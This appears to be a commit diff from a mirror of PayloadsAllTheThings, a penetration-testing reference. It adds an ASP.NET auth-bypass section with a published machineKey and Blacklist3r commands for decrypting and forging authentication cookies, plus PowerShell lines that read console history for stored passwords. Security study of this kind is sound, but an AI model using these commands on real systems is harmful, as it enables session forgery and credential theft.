mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Blacklist3r and Machine Key
This commit is contained in:
parent
97015e4f64
commit
b052f78d95
@ -15,6 +15,8 @@
|
|||||||
- [Twitter API Secret](#twitter-api-secret)
|
- [Twitter API Secret](#twitter-api-secret)
|
||||||
- [Twitter Bearer Token](#twitter-bearer-token)
|
- [Twitter Bearer Token](#twitter-bearer-token)
|
||||||
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
|
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
|
||||||
|
- [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key)
|
||||||
|
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
@ -87,7 +89,31 @@ curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_toke
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Auth Bypass using pre-published Machine Key
|
||||||
|
|
||||||
|
> By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
|
||||||
|
|
||||||
|
That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
|
||||||
|
|
||||||
|
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
|
||||||
|
```
|
||||||
|
|
||||||
|
Exploit with [Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# decrypt cookie
|
||||||
|
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
|
||||||
|
|
||||||
|
# encrypt cookie (edit Decrypted.txt)
|
||||||
|
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
|
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
|
||||||
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
|
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
|
||||||
|
* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
|
@ -44,7 +44,7 @@
|
|||||||
- [Drop the MIC](#drop-the-mic)
|
- [Drop the MIC](#drop-the-mic)
|
||||||
- [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
|
- [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
|
||||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-acls-aces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
- [Trust relationship between domains](#trust-relationship-between-domains)
|
- [Trust relationship between domains](#trust-relationship-between-domains)
|
||||||
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||||
- [Unconstrained delegation](#unconstrained-delegation)
|
- [Unconstrained delegation](#unconstrained-delegation)
|
||||||
|
@ -394,6 +394,7 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
|
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
||||||
cat (Get-PSReadlineOption).HistorySavePath
|
cat (Get-PSReadlineOption).HistorySavePath
|
||||||
cat (Get-PSReadlineOption).HistorySavePath | sls passw
|
cat (Get-PSReadlineOption).HistorySavePath | sls passw
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user